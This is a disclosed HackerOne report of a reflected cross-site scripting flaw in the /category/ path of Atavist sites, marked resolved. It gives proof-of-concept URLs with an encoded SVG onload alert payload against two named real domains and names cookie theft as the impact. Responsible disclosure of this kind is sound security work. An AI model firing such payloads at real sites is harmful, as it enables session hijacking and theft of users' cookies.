Reflected XSS at /category/ on a Atavis theme

Disclosed: 2020-11-18 14:22:03 By bugra To automattic

Medium

Vulnerability Details

## Summary: Hi team, This report is similar to #947790 You fixed the XSS on search, but I found another XSS at `/category/xsspayload` For PoC you can check these URLs : https://magazine.atavist.com/category/%22%3E%3Csvg%20onload%3Dalert%60XSS%60%3E https://docs.atavist.com/category/%22%3E%3Csvg%20onload%3Dalert%60XSS%60%3E You can encode " ' < > characters with HTML encoding in this endpoint. ## Impact Reflected XSS - cookie stealing Thanks, Bugra

Actions

View on HackerOne

Report Stats

Report ID: 950845
State: Closed
Substate: resolved
Upvotes: 15

Reflected XSS at /category/ on a Atavis theme

Vulnerability Details

Actions

Report Stats

Share this report